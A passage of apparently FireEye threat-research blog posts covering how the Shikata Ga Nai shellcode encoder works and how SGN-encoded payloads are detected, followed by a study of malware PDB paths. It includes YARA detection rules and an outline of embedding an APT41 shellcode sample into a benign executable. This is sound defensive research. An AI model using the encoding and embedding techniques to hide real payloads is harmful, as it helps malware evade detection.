Algorithm Breakdown

The algorithm consists of:

  1. Initialization key specification.
  2. Retrieve a location relative to EIP (so that we can modify instructions moving forward based on the address obtained)
    • Metasploit commonly uses the fstenv/fnstenv instructions to put it on the stack where it can be popped into a register for use. There are other ways to get EIP if wanted.
  3. Go through a loop to decode other instructions (by default encoded instructions will all resides in the .text section)
    • Vanilla SGN zeroes out the register to be used as the counter and explicitly moves the counter value into the register, so the loop portion is obvious. The loop instruction is encoded so you won’t see it until decoding has gone far enough.
    • SGN decodes instructions at a higher memory address (it could do lower addresses if it wanted to for more trickery). This is done by adding a value to the stored address from before (the one relative to EIP) and XORing it with the key. In the example that follows you see the instruction XOR  [eax+18h], esi  t .text:00408B98.
    • The address from earlier (the one relative to EIP) is then modified and the key may also be modified [Metasploit by default usually adds or subtracts an instruction value somewhere relative to the address stored from before (the one relative to EIP)].
    • The loop continues until all instructions are decoded and then it moves execution to the decoded shellcode. In this case the reverse shellcode.
  4. As a side note, Shikata Ga Nai allows for multiple iterations. If multiple iterations are chosen, steps 1 to 3 are repeated after the completion of the current iteration.

As you can see from each of the aforementioned steps, if you’re a defender and solely relying on static detection, detection can be quite difficult. With something encoded like this, it is difficult to statically detect the specific malicious behavior without unrolling the encoded instructions. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on the option of detecting via behavioral indicators or sandboxes.


Figure 4: Code before decoding


Figure 5: Instructions being decoded

For many of those that have been in cyber security for a while, this is not new. What is still relevant though is the fact that many malicious payloads encoded with SGN are still making it past defenses and still being used by threat actors. We noticed SGN encoded payloads still making it onto systems and we decided to investigate further. The results were both rewarding and surprising and led to additional detection methods discussed in the “Detection” section. It also gave us more awareness as to the extent SGN was still being used. The following is an example of a payload we recovered from an APT actor.

Embedding a Payload

For this example, we used an existing APT41 sample and embedded the payload into a benign PE. This APT41 sample is shellcode that is Shikata Ga Nai encoded.

MD5: def46c736a825c357918473e3c02b3ef

We will take a benign PE we created (ImNotBad.exe) and we will embed the APT41 sample to show SGN in action. We create a new section called NewSec and set the section values appropriately.


Figure 6: Calculate the size of the shell code. Start address 12000 and End Address 94C10. Make sure the size is within data that is there. The difference is 82c10.


Figure 7: Insert the shell code into the benign PE (ImNotBad.exe)


Figure 8: The embedded shellcode can be found in the code


Figure 9: Patch the code to jump to it


Figure 10: Here are the four steps from the Shikata Ga Nai algorithm (mentioned previously) demonstrated

In Figure 11 and Figure 12, as the first set of instructions are decoded it appears it is attempting to avoid normal execution. EA 25 D9 74 24 F4 BB => Note how the EA and 25 are inserted to cause code to crash (jumping to a curious spot in the code). Further effort was not applied to investigate the crash correctly, but when patching the code with nops, it executes the next decode sequence.


Figure 11: Set of instructions are decoded it appears it is attempting to avoid normal execution


Figure 12: Set of instructions are decoded it appears it is attempting to avoid normal execution

Detection

Detecting SGN encoded payloads can be difficult as a defender, especially if static detection is heavily relied upon. Decoding and unraveling the encoded instructions is necessary to identify the intended malicious purposes. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on detection via behavioral indicators and sandboxes. FireEye appliances contain both static and dynamic detection components. Detection is achieved by a variety of engines, including FireEye's machine learning engine, MalwareGuard. The numerous engines within FireEye appliances serve specific purposes and have different strengths and weaknesses. Creating detection around these various engines allows FireEye to utilize each of their strengths. Correlating activity between these engines allows for unique detection opportunities. This also allows for production detections that would otherwise not be possible when relying on a single engine for detection. We were able to create production detections correlating the different engines on the FireEye appliances to detect SGN encoded binaries with a high fidelity. The current production detections take advantage of static, dynamic and machine learning engines within the FireEye appliance.

As an example of the complications concerned with detecting SGN, we will construct code encoded with a slightly modified version of Metasploit’s plain SGN algorithm (Figure 13): 


Figure 13: Example code for possible static detection

One of the keys to writing a good static detection rule is recognizing the unique malicious behaviors of what you are trying to detect. Next, being able to capture as much of that behavior without causing false positives (FPs). Earlier in the post we listed the core behaviors of the SGN algorithm. For sake of illustration, let’s try to match on some of those behaviors. We’ll attempt to match on the key, the mechanism used to get EIP, and the XOR additive feedback loop.

If we were trying to detect the code in Figure 13 statically, we could use the open source tool Yara. As a first pass we could construct the following rule (Figure 14):


Figure 14: Example SGN YARA static detection rule for the code in Figure 17

In the rule in Figure 14 we have added padding bytes to try and thwart an attacker that would insert junk instructions. If an adversary realized what we were matching on it could be easily defeated by inserting junk code beyond our padding. We could play the game of cat and mouse and continue to increase our padding based on what we saw, but this is not a good solution. In addition, as we pad more bytes out, the rule becomes more FP prone. Besides adding junk code, other obvious evasion techniques an attacker could use include: using different registers, performing arithmetic operations to obtain values or reordering instructions. Metasploit does a decent job randomizing the algorithm with these things which makes static detection more difficult. As we try to catch each modified version it could be never-ending.

Static detection is a useful technique, but very limited. If this is all you rely on, you will miss much of the malicious behavior getting onto your systems. For SGN, we studied it further and identified the core behavioral pieces. We saw how it was still being used by modern malware. The following is an example hunting rule that can be used to detect some of the current common permutations created by vanilla x86-SGN in Metasploit. This rule can be further expanded upon to include additional logic if desired.

rule Hunting_Rule_ShikataGaNai
{
    meta:
        author = "Steven Miller"
    strings:
        $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
        $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
    condition:
        any of them
}

Thoughts

Metasploit is used by many different people for many different reasons. Some may use Metasploit for legitimate purposes such as red team engagements, research or educational tasks, while others may use the framework with a malicious intent. In the latter category, FireEye has historically observed APT20, a suspected Chinese nation state sponsored threat group, utilize Metasploit with SGN encoded payloads. APT20 is one of the many named threat groups that FireEye tracks. This group has a primary focus on stealing data, specifically intellectual properties. Other named groups include APT41 and FIN6. APT41 was formally disclosed by FireEye Intelligence earlier this year. This group has utilized SGN encoded payloads within custom developed backdoors. APT41 is a Chinese cyber threat group that has been observed carrying out financially motivated missions coinciding with cyber-espionage operations. Financial threat group FIN6 has also used SGN encoded payloads to carry out their missions, and they have historically relied upon various publicly available tools. These missions largely involve theft of payment card data from point-of-sale systems. FireEye has also observed numerous uncategorized threat groups utilizing payloads encoded with SGN. These are groups that FireEye tracks internally, but have not been announced formally. One of these groups in particular is UNC902, which is largely known as the financially motivated group TA505 in public threat reports. FireEye has observed UNC902 extensively use SGN encoding within their payloads and we continue to see activity related to this group, even as recently as October 2019. Outside of these groups, we continue to observe usage of SGN encoding within malicious samples. FireEye currently identifies hundreds of SGN encoded payloads on a monthly basis. SGN encoded payloads are not always used with the same intent, but this is one side effect of being embedded into such a popular and freely available framework. Looking forward, we expect to see continued usage of SGN encoded payloads.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab and answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project Visual Studio in a default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During the compilation, the linker program associates the PDB file with the built executable by adding an entry into the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView and so the PDB path is embedded under IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file Test.pdb while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type

Description

DWORD

"RSDS" header

GUID

16-byte Globally Unique Identifier

DWORD

"age" (incrementing # of revisions)

BYTE

PDB path, null terminated

Figure 7: Structure of CodeView debug directory information

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths, those that are fully qualified directory paths and those that are partially qualified, that specify the name of the PDB file only. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths, with represented malware families and threat groups where at least one sample has the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Keyword

Families and Groups Observed

Example PDB Path

anti

RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER
APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765

H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

attack

 

MINIASP, SANNY, DIRTCHEAP, ORCUSRAT
APT1, UNC776, UNC251. UNC1131

 

E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

backdoor

PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN

APT41, APT34, APT37, UNC52, UNC1131, APT40

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

 

bind

 

SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE

UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822

C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

bypass

 

POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU

APT10, APT34, APT21, UNC1289, UNC1450

C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

downloader

 

SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS

APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031

Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

dropper

 

CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF

UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849

D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

exploit

 

TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT

UNC1030, APT39, APT34, FIN6

w:\modules\exploits\littletools\agent_wrapper\release\
12345678901234567890123456789012345678\wrapper3.pdb

fake

 

FIRESHADOW

UNC1172, APT39, UNC822

D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

 

fuck

 

TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN

APT17, UNC208, UNC276

E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

 

hack

 

PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL

UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8

C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

 

hide

 

FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL

APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282

c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

hook

 

GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN

UNC842, UNC1197, UNC1040, UNC969

D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

 

inject

 

SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE

UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575

E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

install

 

FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, EXCHAIN, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL

UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53

i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

keylog

 

LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE

APT37, UNC82, UNC1095, APT1, APT40

D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

payload

 

POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE

UNC915, UNC632, UNC1149, APT28, UNC878

C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

 

shell

 

SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH

UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559

E:\windows\dropperNew\Debug\testShellcode.pdb

sleep

 

URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID

FIN7

O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\
src\sdb_test_dll\x64\Release\sdb_test.pdb

spy

 

DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR

FIN7, UNC583, UNC822, UNC1120

G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

trojan

 

ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT

UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559

e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable is compiled in a non-enterprise setting. For example, any PDB path containing “Users” directory can tell you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker or lower in fidelity than “shellcode” but as we demonstrate below, these terms are indeed present in lots of malware and can be used for weak detection signals.

PDB Path Term Prevalence

Term

Families and Groups Observed

Example PDB Path

Users

ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS

APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562

C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

ConsoleApplication

WindowsApplication

WindowsFormsApplication

 

(Visual Studio default project names)

CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW

APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507

D:\Projects\ByPassAV\ConsoleApplication1\
Release\ConsoleApplication1.pdb

New Folder

HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE

APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559

c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Copy

DESERTFALCON, KASPER, NJRAT, RYUK, SOGU

UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289

D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Desktop

AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT

APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352

C:\Users\Develop_MM\Desktop\sc_loader\
Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered on a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables, and is likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry, and if it is zero we can presume that there is no debug entry and thus the presence of a CodeView PDB path indicates that there is a subfile.

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
   strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
   condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

